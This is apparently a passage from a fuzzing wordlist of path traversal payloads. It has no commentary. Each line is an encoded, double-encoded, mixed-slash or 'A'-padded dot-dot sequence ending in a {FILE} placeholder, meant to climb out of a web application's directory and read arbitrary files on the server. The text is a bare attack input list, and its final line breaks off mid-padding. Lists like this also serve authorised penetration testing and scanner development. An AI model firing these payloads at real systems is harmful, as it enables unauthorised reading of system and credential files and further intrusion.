%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA